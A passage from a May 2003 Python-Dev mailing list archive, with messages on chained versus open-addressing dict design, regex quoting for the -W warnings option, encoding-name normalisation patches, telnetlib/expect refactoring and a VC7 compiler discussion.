dG9wdGlvbigpCiAgZGVmIF9nZXRjYXRlZ29yeShjYXRlZ29yeSk6Ci0gICAgIGltcG9ydCBy
ZQogICAgICBpZiBub3QgY2F0ZWdvcnk6CiAgICAgICAgICByZXR1cm4gV2FybmluZwogICAg
ICBpZiByZS5tYXRjaCgiXlthLXpBLVowLTlfXSskIiwgY2F0ZWdvcnkpOgotLS0gMTk4LDIw
MyAtLS0tCkluZGV4OiBMaWIvZW5jb2RpbmdzL19faW5pdF9fLnB5Cj09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0K
UkNTIGZpbGU6IC9jdnNyb290L3B5dGhvbi9weXRob24vZGlzdC9zcmMvTGliL2VuY29kaW5n
cy9fX2luaXRfXy5weSx2CnJldHJpZXZpbmcgcmV2aXNpb24gMS4xOApkaWZmIC1jIC1yMS4x
OCBfX2luaXRfXy5weQoqKiogTGliL2VuY29kaW5ncy9fX2luaXRfXy5weQkyNCBBcHIgMjAw
MyAxNjowMjo0OSAtMDAwMAkxLjE4Ci0tLSBMaWIvZW5jb2RpbmdzL19faW5pdF9fLnB5CTE0
IE1heSAyMDAzIDE5OjI3OjMyIC0wMDAwCioqKioqKioqKioqKioqKgoqKiogMjcsMzkgKioq
KgogIAogICIiIiMiCiAgCiEgaW1wb3J0IGNvZGVjcywgZXhjZXB0aW9ucywgcmUKICAKICBf
Y2FjaGUgPSB7fQogIF91bmtub3duID0gJy0tdW5rbm93bi0tJwogIF9pbXBvcnRfdGFpbCA9
IFsnKiddCiEgX25vcm1fZW5jb2RpbmdfUkUgPSByZS5jb21waWxlKCdbXmEtekEtWjAtOS5d
JykKICAKICBjbGFzcyBDb2RlY1JlZ2lzdHJ5RXJyb3IoZXhjZXB0aW9ucy5Mb29rdXBFcnJv
ciwKICAgICAgICAgICAgICAgICAgICAgICAgICAgZXhjZXB0aW9ucy5TeXN0ZW1FcnJvcik6
CiAgICAgIHBhc3MKLS0tIDI3LDQ4IC0tLS0KICAKICAiIiIjIgogIAohIGltcG9ydCBjb2Rl
Y3MsIGV4Y2VwdGlvbnMsIHN0cmluZwogIAogIF9jYWNoZSA9IHt9CiAgX3Vua25vd24gPSAn
LS11bmtub3duLS0nCiAgX2ltcG9ydF90YWlsID0gWycqJ10KISAjX25vcm1fZW5jb2Rpbmdf
UkUgPSByZS5jb21waWxlKCdbXmEtekEtWjAtOS5dJykKICAKKyAjIGEgbGl0dGxlIGRhbmNl
IHRvIGF2b2lkIHVzaW5nIHJlCisgX25vcm1fZW5jb2RpbmdfdHJhbnMgPSAoIl8iKm9yZCgn
MCcpKworICAgICAgICAgICAgICAgICAgICAgICAgIHN0cmluZy5kaWdpdHMrCisgICAgICAg
ICAgICAgICAgICAgICAgICAgIl8iKihvcmQoJ0EnKS1vcmQoJzknKS0xKSsKKyAgICAgICAg
ICAgICAgICAgICAgICAgICBzdHJpbmcuYXNjaWlfdXBwZXJjYXNlKworICAgICAgICAgICAg
ICAgICAgICAgICAgICJfIioob3JkKCdhJyktb3JkKCdaJyktMSkrCisgICAgICAgICAgICAg
ICAgICAgICAgICAgc3RyaW5nLmFzY2lpX2xvd2VyY2FzZSsKKyAgICAgICAgICAgICAgICAg
ICAgICAgICAiXyIqKDI1Ni1vcmQoJ3onKS0xKSkKKyAgICAgICAgICAgICAgICAgICAgICAg
ICAKICBjbGFzcyBDb2RlY1JlZ2lzdHJ5RXJyb3IoZXhjZXB0aW9ucy5Mb29rdXBFcnJvciwK
ICAgICAgICAgICAgICAgICAgICAgICAgICAgZXhjZXB0aW9ucy5TeXN0ZW1FcnJvcik6CiAg
ICAgIHBhc3MKKioqKioqKioqKioqKioqCioqKiA0OCw1NCAqKioqCiAgICAgICAgICBiZWNv
bWVzICdfJy4KICAKICAgICAgIiIiCiEgICAgIHJldHVybiAnXycuam9pbihfbm9ybV9lbmNv
ZGluZ19SRS5zcGxpdChlbmNvZGluZykpCiAgCiAgZGVmIHNlYXJjaF9mdW5jdGlvbihlbmNv
ZGluZyk6CiAgCi0tLSA1Nyw2MyAtLS0tCiAgICAgICAgICBiZWNvbWVzICdfJy4KICAKICAg
ICAgIiIiCiEgICAgIHJldHVybiBzdHJpbmcudHJhbnNsYXRlKGVuY29kaW5nLCBfbm9ybV9l
bmNvZGluZ190cmFucykKICAKICBkZWYgc2VhcmNoX2Z1bmN0aW9uKGVuY29kaW5nKToKICAK
--g4s0SsAiBg--


From dave@boost-consulting.com  Thu May 15 01:22:46 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 14 May 2003 20:22:46 -0400
Subject: [Python-Dev] Re: MS VC 7 offer
References: <3EBCABD0.7050700@lemburg.com> <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>
 <3EBCABD0.7050700@lemburg.com>
 <5.1.1.6.0.20030512222353.022ade78@torment.chelsea.private>
Message-ID: <uy919ys6h.fsf@boost-consulting.com>

Barry Scott <barry@barrys-emacs.org> writes:

> Did I miss the answer to why bother to move to VC7?
>
> As a C project I know of very little to recommend VC7 or VC7.1.
> As a C++ developer I've decided that VC7 as little more then a broken
> VC6. 

That was roughly my experience, support for template template
arguments notwithstanding.

> Maybe Jesse Lipcon (who works for MS now) has managed to
> make VC7.1 more standards compatible for C++ work, which would
> recommend it to C++ developers.

That's not a maybe.  As a hard-core C++-head, I can tell you that
it's like night and day.  VC7.1 is very, very good.

> Note that wxPython claims that it will not compile correctly with
> VC7 unless you add a work around for a bug in the code generator.

It's very unlikely that this bug survived the VC7.1 release, but I
suppose it's possible.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From tim.one@comcast.net  Thu May 15 04:08:18 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 14 May 2003 23:08:18 -0400
Subject: [Python-Dev] Simple dicts
Message-ID: <LNBBLJKPBEHFEDALKOLCEEKEEFAB.tim.one@comcast.net>

Behind the scenes, Damien Morton has been playing with radically different
designs for "small" dicts.  This reminded me that, in previous lives, I
always used chaining ("linked lists") for collision resolution in hash
tables.  I don't have time to pursue this now, but it would make a nice
experiment for someone who wants to try a non-trivial but still-simple and
interesting project.  It may even pay off, but that shouldn't be a
motivation <wink>.

Design notes:

PyDictEntry would grow a new

	PyDictEntry *next;

slot, boosting it from 12 to 16 bytes on a 32-bit box.  This wasn't
reasonable when Python was designed, but pymalloc allocates 16-byte chunks
with virtually no wasted space.

PyDictObject would loose the ma_fill and ma_table and ma_smalltable members,
and gain a pointer to a variable-size vector of pointers

	PyDictEntry **first;

For a hash table with 2**n slots, this vector holds 2**n pointers, memset to
NULL initially.  The hash chain for an object with hash code h starts at
first[h & ma_mask], and is linked together via PyDictEntry.next pointers.
Hash chains per hash code are independent.  There's no use for the "dummy"
state.  There's no *logical* need for the "unused" state either, although a
micro-optimizer may want to retain that in some form.

Memory use isn't nearly as bad as it may first appear -- to the contrary,
it's probably better on average!  Assuming a 32-bit box:

Current:  tables are normally 1/3 to 2/3 full.  If there are N active
objects in the table, at 1/3 full the table contains 3*N PyDictEntries, and
at 2/3 full it contains 1.5*N PyDictEntries, for a total of (multiplying by
12 bytes per PyDictEntry) 18*N to 36*N bytes.

Chaining:  assuming tables are still 1/3 to 2/3 full.  At 1/3 full there are
3*N first pointers and at 2/3 full there are 1.5*N first pointers, for a
total of 6*N to 12*N bytes for first pointers.  Independent of load factor,
16*N bytes are consumed by the larger PyDictEntry structs.  Adding, that's
22*N to 28*N bytes.  This relies on pymalloc's tiny wastage when allocating
16-byte chunks (under 1%).  The worst case is worse than the current scheme,
and the best case is better.  The average is probably better.

Note that "full" is a misnomer here.  A chained table with 2**i slots can
actually hold any number of objects, even if i==0; on average, each hash
chain contains N/2**i PyDictEntry structs.

Note that a small load factor is less important with chained resolution than
with open addressing, because collisions at different hash codes can't
interfere with each other (IOW, an object in slot #i never slows access to
an object in the slot #j collision list, whenever i != j; "breathing room"
to ease cross-hashcode collision pressure isn't needed; primary collisions
are all that exist).

Collision resolution code:  Just a list walk.  For example, lookdict_string
could be, in its entirety:

static dictentry *
lookdict_string(dictobject *mp, PyObject *key, register long hash)
{
	dictentry *p = mp->first[hash & mp->ma_mask];

	if (PyString_CheckExact(key)) {
		for (; p != NULL; p = p->next) {
			if (p->me_key == key ||
			    (ep->me_hash == hash &&
			     PyString_Eq(ep->me_key, key)))
				return p;
		}
		return NULL;
	}

	mp->ma_lookup = lookdict;
	return lookdict(mp, key, hash);
}

Resizing:  Probably much faster.  The vector of first pointers can be
realloc'ed, and sometimes benefit from the platform malloc extending it
in-place.  No other memory allocation operation is needed on a resize.
Instead about half the PyDictEntry structs will need to move to "the other
half" of the table (the structs themselves don't get copied or moved; they
just get relinked via their next pointers).

Copying:  Probably slower, due to needing a PyObject_Malloc() call for each
key/value pair.

Building a dict up:  Probably slower, again due to repeated
PyObject_Malloc() calls.

Referencing a dict:  Probably a wash, although because the code can be so
much simpler compilers may do a better job of optimizing it, and no tests
are needed to distinguish among three kinds of states.  Out-of-cache dicts
are killers either way.  Also see next point.

Optimizations:  The cool algorithmic thing about chaining is that
self-organizing gimmicks (like swap-toward-front (or move-to-front) on
reference) are easy to code and run fast (again, the dictentry structs don't
move, you just need to fiddle a few next pointers).  When collision chains
can collide, dynamic table reorganization is so complicated and expensive
that nobody has even thought about trying it in Python.  When they can't
collide, it's simple.  Note too that since the memory burden per unused slot
falls from 12 to 4 bytes, sparser tables are less painful to contemplate.

Small dicts:  There's no gimmick here to favor them.



From cgw@alum.mit.edu  Thu May 15 05:38:26 2003
From: cgw@alum.mit.edu (Charles G Waldman)
Date: Wed, 14 May 2003 23:38:26 -0500
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: <20030515030905.382.60542.Mailman@mail.python.org>
References: <20030515030905.382.60542.Mailman@mail.python.org>
Message-ID: <16067.6594.326128.398884@nyx.dyndns.org>

GvR> only reason I can come up with is that for dotted names, the dot would
GvR> have to be escaped on the command line, and escaping something on the
GvR> command line is painful because \ is also a shell escape character, so
GvR> you'd have to escape the escape.

I'm afraid I must be missing something terribly obvious here, but why
would you need to escape a dot on a command line?  None of the shells
I'm familiar with treat dot as a metacharacter.  Isn't `?' the
standard shell metacharacter for "any character"?  Filename patterns
on the shell command line are "glob patterns", not RE's.

But, like I said, I'm probably missing something.  I think I'll go
back into the shadows to lurk some more now....  Charles


From fdrake@acm.org  Thu May 15 05:43:57 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 15 May 2003 00:43:57 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib
 warnings.py,1.19,1.20
In-Reply-To: <16067.6594.326128.398884@nyx.dyndns.org>
References: <20030515030905.382.60542.Mailman@mail.python.org>
 <16067.6594.326128.398884@nyx.dyndns.org>
Message-ID: <16067.6925.897980.796041@grendel.zope.com>

Charles G Waldman writes:
 > I'm afraid I must be missing something terribly obvious here, but why
 > would you need to escape a dot on a command line?  None of the shells
 > I'm familiar with treat dot as a metacharacter.  Isn't `?' the
 > standard shell metacharacter for "any character"?  Filename patterns
 > on the shell command line are "glob patterns", not RE's.

It's not the shell that treats it as a metacharacter, but the RE
syntax.  Preventing "." from being treated as an RE metacharacter
would be done by inserting a "\" character, which is a shell
metacharacter, and would need another "\" to escape that, so that one
of the "\" would end up in the RE.

Of course, my favorite way of dealing with this is to use single
quotes around the argument rather than backslashes; that works fine in
sh-syntax shells, and doesn't require doubling-up backslashes.



  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From drifty@alum.berkeley.edu  Thu May 15 07:45:54 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Wed, 14 May 2003 23:45:54 -0700
Subject: [Python-Dev] Simple dicts
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEKEEFAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCEEKEEFAB.tim.one@comcast.net>
Message-ID: <3EC337A2.7060702@ocf.berkeley.edu>

Tim Peters wrote:
> Behind the scenes, Damien Morton has been playing with radically different
> designs for "small" dicts.  This reminded me that, in previous lives, I
> always used chaining ("linked lists") for collision resolution in hash
> tables.  I don't have time to pursue this now, but it would make a nice
> experiment for someone who wants to try a non-trivial but still-simple and
> interesting project.  It may even pay off, but that shouldn't be a
> motivation <wink>.
> 

When I took data structures I was taught that chaining was actually the 
easiest way to do hash tables and they still had good performance 
compared to open addressing.  Because of this taught bias I always 
wondered why Python used open addressing; can someone tell me?

I am interested in seeing how this would pan out, but I am unfortunately 
going to be busy for the next three days (if anyone is going to be at E3 
Thursday or Friday for some odd reason let me know since I will be 
there).  If someone takes this up please let me know; I am interested in 
helping if I can.  Perhaps this should be a sandbox thing?

-Brett



From lkcl@samba-tng.org  Thu May 15 09:59:27 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Thu, 15 May 2003 08:59:27 +0000
Subject: [Python-Dev] Re: sf.net/708007: expectlib.py telnetlib.py split
In-Reply-To: <20030513225740.GH2305@localhost>
References: <20030513225740.GH2305@localhost>
Message-ID: <20030515085927.GD908@localhost>

raymond, regarding expect.py which you give a link to:

- expect.py is extremely basic, offering pretty much only read and
  write.

  what it _actually_ offers is an advantage over the python
  distribution's popen2/3 because it catches ptys (stdin)
  even on ssh and passwd.

- expectlib.py [new] _is_ telnetlib.py [old] - with over-rideable
  read, write, open and close methods.

- pexpect is like... an independently developed version of the above,
  with all of the above functionality And Then Some - including
  an ANSI screen emulator should an application developer choose to
  use it.

what i figure is a sensible roadmap to suggest / propose to people:

- telnetlib.py [old] gets split into telnetlib.py [patched] plus
  expectlib.py [patched].

- noah investigates expectlib.py and a) works some magic on it
  b) uses it in pexpect.

- someone independently investigates expect.py's popen2 c-code
  capability to see if it can be merged into the python distribution.


i do not know if it is a "bug" that python's popen functions cannot
capture ssh / passwd but it would certainly appear to be sensible
to have an option to allow ALL user input to be captured.

certainly i found it a total pain two years ago to have to patch
ssh to allow a user password to be accepted on the command-line!

[i didn't know about expect.py then]


last time i spoke to guido about the telnetlib.py/expectlib.py patch,
he a) wasn't so madly busy as he is now, b) rejected the then-patch
because it wasn't clean c) acknowledged that telnetlib.py is a mess
and needed a complete rewrite.

since that time, i notice that telnetlib.py has had a control-char
handling function, which alleviates some of the need for a complete
rewrite.

l.

On Tue, May 13, 2003 at 10:57:40PM +0000, Luke Kenneth Casson Leighton wrote:

> [i am not on the python-dev list but i check the archives, please cc me]
> 
> approximately two years ago i needed the functionality outlined
> in the present telnetlib.py for several other remote protocols,
> most notably commands (including ssh and bash) and also HTTP.
> 
> i figure that this functionality should be more than invaluable
> to other python developers.


From walter@livinglogic.de  Thu May 15 11:05:22 2003
From: walter@livinglogic.de (=?ISO-8859-1?Q?Walter_D=F6rwald?=)
Date: Thu, 15 May 2003 12:05:22 +0200
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,
 1.19, 1.20
In-Reply-To: <16066.39367.822086.836812@montanaro.dyndns.org>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>        <200305141737.h4EHbMv06730@odiug.zope.com>        <16066.33949.903064.834797@montanaro.dyndns.org>        <16066.34707.101894.297890@montanaro.dyndns.org>        <200305141823.h4EINGt15343@odiug.zope.com> <16066.39367.822086.836812@montanaro.dyndns.org>
Message-ID: <3EC36662.5070706@livinglogic.de>

This is a multi-part message in MIME format.
--------------020507060202080607040303
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

Skip Montanaro wrote:

> [...]
> I've got to get back to some paying work, so I can't pursue this more at the
> moment.  Attached are my current diffs for warnings.py and encodings/
> __init__.py if someone has a few moments to look at it.

Your normalize_encoding() doesn't preserve the "." and it doesn't
collapse consecutive non-alphanumeric characters. Furthermore it imports
the string module. How about the attached patch? Constructing the
translation string might be bad for startup time.

Bye,
    Walter Dörwald


--------------020507060202080607040303
Content-Type: text/plain;
 name="diff.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="diff.txt"

Index: Lib/encodings/__init__.py
===================================================================
RCS file: /cvsroot/python/python/dist/src/Lib/encodings/__init__.py,v
retrieving revision 1.18
diff -u -r1.18 __init__.py
--- Lib/encodings/__init__.py	24 Apr 2003 16:02:49 -0000	1.18
+++ Lib/encodings/__init__.py	15 May 2003 10:00:52 -0000
@@ -32,7 +32,13 @@
 _cache = {}
 _unknown = '--unknown--'
 _import_tail = ['*']
-_norm_encoding_RE = re.compile('[^a-zA-Z0-9.]')
+_norm_encoding_trans = []
+for i in xrange(128):
+    c = chr(i)
+    if not c.isalnum() and not c==".":
+        c = "_"
+    _norm_encoding_trans.append(c)
+_norm_encoding_trans = "".join(_norm_encoding_trans) + "_"*128
 
 class CodecRegistryError(exceptions.LookupError,
                          exceptions.SystemError):
@@ -48,7 +54,7 @@
         becomes '_'.
 
     """
-    return '_'.join(_norm_encoding_RE.split(encoding))
+    return '_'.join(filter(None, encoding.translate(_norm_encoding_trans).split("_")))
 
 def search_function(encoding):
 

--------------020507060202080607040303--



From guido@python.org  Thu May 15 12:07:04 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 07:07:04 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib
 warnings.py,1.19,1.20
In-Reply-To: "Your message of Thu, 15 May 2003 00:43:57 EDT."
 <16067.6925.897980.796041@grendel.zope.com>
References: <20030515030905.382.60542.Mailman@mail.python.org>
 <16067.6594.326128.398884@nyx.dyndns.org>
 <16067.6925.897980.796041@grendel.zope.com>
Message-ID: <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net>

> Of course, my favorite way of dealing with this is to use single
> quotes around the argument rather than backslashes; that works fine in
> sh-syntax shells, and doesn't require doubling-up backslashes.

Agreed, but you're still using two levels of quoting, and with
anything less, "foo.bar" will also match a module named "foolbar".

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Thu May 15 12:10:37 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 07:10:37 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: "Your message of Wed, 14 May 2003 23:45:54 PDT."
 <3EC337A2.7060702@ocf.berkeley.edu>
References: <LNBBLJKPBEHFEDALKOLCEEKEEFAB.tim.one@comcast.net>
 <3EC337A2.7060702@ocf.berkeley.edu>
Message-ID: <200305151110.h4FBAb717062@pcp02138704pcs.reston01.va.comcast.net>

> When I took data structures I was taught that chaining was actually the 
> easiest way to do hash tables and they still had good performance 
> compared to open addressing.  Because of this taught bias I always 
> wondered why Python used open addressing; can someone tell me?

It was my choice, but I don't recall why.  Probably because Knuth said
so.  Or because it's simpler to implement with a single allocated
block (I think I was aware of the cost of malloc(), or else tuples and
strings would have used two blocks.  BTW, why don't Unicode objects
use this trick?)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake@acm.org  Thu May 15 13:09:57 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 15 May 2003 08:09:57 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib
 warnings.py,1.19,1.20
In-Reply-To: <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net>
References: <20030515030905.382.60542.Mailman@mail.python.org>
 <16067.6594.326128.398884@nyx.dyndns.org>
 <16067.6925.897980.796041@grendel.zope.com>
 <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <16067.33685.659075.459229@grendel.zope.com>

Guido van Rossum writes:
 > Agreed, but you're still using two levels of quoting, and with
 > anything less, "foo.bar" will also match a module named "foolbar".

Agreed.  "foo\.bar" will match "foolbar" as well, but 'foo\.bar' only
matches "foo.bar".  The advantage of single quotes is that you're not
escaping the escape characters with themselves; what's inside the
quotes is simple RE syntax, so you only need to think about one of the
layers at a time.

Either approach works, of course.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From aahz@pythoncraft.com  Thu May 15 13:44:34 2003
From: aahz@pythoncraft.com (Aahz)
Date: Thu, 15 May 2003 08:44:34 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: <16067.33685.659075.459229@grendel.zope.com>
References: <20030515030905.382.60542.Mailman@mail.python.org> <16067.6594.326128.398884@nyx.dyndns.org> <16067.6925.897980.796041@grendel.zope.com> <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net> <16067.33685.659075.459229@grendel.zope.com>
Message-ID: <20030515124434.GA20979@panix.com>

On Thu, May 15, 2003, Fred L. Drake, Jr. wrote:
> Guido van Rossum writes:
>> 
>> Agreed, but you're still using two levels of quoting, and with
>> anything less, "foo.bar" will also match a module named "foolbar".
> 
> Agreed.  "foo\.bar" will match "foolbar" as well, but 'foo\.bar' only
> matches "foo.bar".  The advantage of single quotes is that you're not
> escaping the escape characters with themselves; what's inside the
> quotes is simple RE syntax, so you only need to think about one of the
> layers at a time.

The point is that with current behavior you can use foo.bar on the
command line and not worry, because "." is a meta character in neither
shell nor Python.
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From gward@python.net  Thu May 15 14:39:27 2003
From: gward@python.net (Greg Ward)
Date: Thu, 15 May 2003 09:39:27 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <3EC337A2.7060702@ocf.berkeley.edu>
References: <LNBBLJKPBEHFEDALKOLCEEKEEFAB.tim.one@comcast.net> <3EC337A2.7060702@ocf.berkeley.edu>
Message-ID: <20030515133927.GA15523@cthulhu.gerg.ca>

On 14 May 2003, Brett C. said:
> When I took data structures I was taught that chaining was actually the 
> easiest way to do hash tables and they still had good performance 
> compared to open addressing.  Because of this taught bias I always 
> wondered why Python used open addressing; can someone tell me?

If your nodes are small, chaining has a huge overhead -- an extra
pointer for each node in a chain.  You can play around with glomming
several nodes together to amortize the cost of those pointers, but ISTR
the win isn't that big.

Open addressing is more memory-efficient, but when the hash table fills
(or gets close to full), you absolutely positively have to rehash.

(Back in January, I played around with writing a custom hash table for
keeping ZODB indexes in memory without using a Python dict, so that's
why I'm fairly fresh on hash table minutiae.)

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
NOBODY expects the Spanish Inquisition!


From skip@pobox.com  Thu May 15 15:20:36 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 15 May 2003 09:20:36 -0500
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib
 warnings.py,1.19,1.20
In-Reply-To: <16067.33685.659075.459229@grendel.zope.com>
References: <20030515030905.382.60542.Mailman@mail.python.org>
 <16067.6594.326128.398884@nyx.dyndns.org>
 <16067.6925.897980.796041@grendel.zope.com>
 <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net>
 <16067.33685.659075.459229@grendel.zope.com>
Message-ID: <16067.41524.485389.151519@montanaro.dyndns.org>

    Fred> Guido van Rossum writes:
    >> Agreed, but you're still using two levels of quoting, and with
    >> anything less, "foo.bar" will also match a module named "foolbar".

    Fred> Agreed.  "foo\.bar" will match "foolbar" as well, but 'foo\.bar'
    Fred> only matches "foo.bar".

Coming back to my original question, does it make sense to allow regular
expressions in the message and module fields in a -W command line arg?  The
complexity of all the shell/re quoting suggests not, but having -W args
treated differently than the args to filterwarnings() doesn't seem right.

Perhaps this is something that never happens in practice.  I've never used
-W.  Are there people out there who have used it and wished the message and
module fields could be regular expressions?  Conversely, does anyone make
use of the fact that the message and module args to filterwarnings() can be
regular expressions?

Looking through the Python source I see several examples of filterwarning()
where one or the other of the message and module args are regular
expressions, so that answers the second question.  The first remains open.

Skip


From guido@python.org  Thu May 15 15:27:58 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 10:27:58 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: Your message of "Thu, 15 May 2003 09:20:36 CDT."
 <16067.41524.485389.151519@montanaro.dyndns.org>
References: <20030515030905.382.60542.Mailman@mail.python.org> <16067.6594.326128.398884@nyx.dyndns.org> <16067.6925.897980.796041@grendel.zope.com> <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net> <16067.33685.659075.459229@grendel.zope.com>
 <16067.41524.485389.151519@montanaro.dyndns.org>
Message-ID: <200305151427.h4FERwL14363@odiug.zope.com>

>     Fred> Guido van Rossum writes:
>     >> Agreed, but you're still using two levels of quoting, and with
>     >> anything less, "foo.bar" will also match a module named "foolbar".
> 
>     Fred> Agreed.  "foo\.bar" will match "foolbar" as well, but 'foo\.bar'
>     Fred> only matches "foo.bar".
> 
> Coming back to my original question, does it make sense to allow regular
> expressions in the message and module fields in a -W command line arg?  The
> complexity of all the shell/re quoting suggests not, but having -W args
> treated differently than the args to filterwarnings() doesn't seem right.
> 
> Perhaps this is something that never happens in practice.  I've never used
> -W.  Are there people out there who have used it and wished the message and
> module fields could be regular expressions?  Conversely, does anyone make
> use of the fact that the message and module args to filterwarnings() can be
> regular expressions?
> 
> Looking through the Python source I see several examples of filterwarning()
> where one or the other of the message and module args are regular
> expressions, so that answers the second question.  The first remains open.

I'll call YAGNI on regexps for -W.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Thu May 15 15:33:56 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 15 May 2003 10:33:56 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <3EC337A2.7060702@ocf.berkeley.edu>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEDKFLAA.tim.one@comcast.net>

[Brett C.]
> When I took data structures I was taught that chaining was actually the
> easiest way to do hash tables and they still had good performance
> compared to open addressing.  Because of this taught bias I always
> wondered why Python used open addressing; can someone tell me?

malloc overhead is a major drag; as my msg said, the feasibility depends on
pymalloc's very low overhead, and that dictentry nodes are 12 bytes apiece
even now; pymalloc didn't exist back then, and Python wasn't originally
micro-optimized as it is now (e.g., there wasn't the current zoo of
dedicated free-lists, or pre-allocation strategies, and dicts could *only*
be indexed by strings so collision only had to worry about the kinds of
problems a single known hash function was prone to).

> I am interested in seeing how this would pan out, but I am unfortunately
> going to be busy for the next three days (if anyone is going to be at E3
> Thursday or Friday for some odd reason let me know since I will be
> there).  If someone takes this up please let me know; I am interested in
> helping if I can.  Perhaps this should be a sandbox thing?

There's no rush <wink>, and I'd be surprised if Python adopted a different
scheme in the end anyway.  It's likely a just-for-fun to-see-what-happens
project.

Note one nasty class of problem:  in chaining *only* primary collisions
exist.  The current dict implementation turned the problem of
open-addressing's secondary collisions into "a feature", which will become
clear when you contemplate dictobject.c's

    [i << 16 for i in range(20000)]

example.  Python's original dict design didn't have a problem with this
because it used prime numbers for table sizes and reduced 32-bit hashes via
mod-by-a-prime.  The current scheme of just grabbing the last i bits is both
much faster and more delicate than that, and we really rely on the collision
resolution strategy now to protect against unlucky bit patterns.

Another way of looking at this is that the current scheme has a way to get
all 32 bits of a hash code to participate in which table slot gets selected;
mod-by-an-odd-prime also gets all bits into play; peel-off-the-last-i-bits
does not.



From damien.morton@acm.org  Thu May 15 23:25:13 2003
From: damien.morton@acm.org (Damien Morton)
Date: Thu, 15 May 2003 18:25:13 -0400
Subject: [Python-Dev] Simple dicts
Message-ID: <006301c31b30$da69e8e0$6401a8c0@damien>

Im currently working on an open-chaining dict. Between paying work and
coming to grips with the python innards, it might take a little while.

I was working on an implementation optimised for dicts with <256 entries
that attempted to squeeze the most out of memory by using bytes for the
'first' and 'next' pointers. This kind of hashtable can be _extremely_
sparse compared to the current dict implementation. With the
byte-oriented open-chaining approach, the break-even point for memory
usage (compared to the current approach) happens at a max load factor of
about 0.1. 

Im not sure that alloc()/free() for each dictentry is a win (if only
because of pymalloc call overhead), and instead imagine a scheme whereby
each dict would pre-alloc() a block of memory and manages its own
free-lists. Theoretically, this makes copying and disposing of dicts
much easier. It also helps ensure locality of reference. In fact,
immediately after a doubling, the open-addressing hashtable scheme still
'uses' (in the sense of potentially addressing) all of the memory
allocated to it, whereas the open-chaining approach 'uses' only the
first pointers and the actual dictentries in use - about 2/3 of the
space the open-addressing scheme uses.

On the other hand, as Tim pointed out to me in a private email, there is
so much overhead in just getting to the hashtable inner loop, going
around that loop one time instead of two or three seems inconsequential.

On the third hand, first-miss and first-hit lookups are simple enough
that they could easily be put into a macro. I will need to take a closer
look at Oren Tirosh's fastnames patch.

I have a question that someone may be able to answer:

There seem to be two different ways to get/set/del from a dictionary.

The first is using PyDict_[Get|Set|Del]Item()

The second is using the embarssingly named dict_ass_sub() and its
partner dict_subscript().

Which of these two access methods is most likely to be used?



From lkcl@samba-tng.org  Thu May 15 22:44:18 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Thu, 15 May 2003 21:44:18 +0000
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <yu99n0j9gdas.fsf@europa.research.att.com>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com>
Message-ID: <20030515214417.GF3900@localhost>

On Wed, Apr 02, 2003 at 09:54:35AM -0500, Andrew Koenig wrote:
> Luke> example code:
> Luke> log = {}
> 
> Luke> 	for t in range(5):
> Luke> 		for r in range(10):
> Luke> 			log.setdefault(r, '') += "test %d\n" % t
> 
> Luke> pprint(log)
> 
> Luke> instead, as the above is not possible, the following must be used:
> 
> Luke> from operator import add
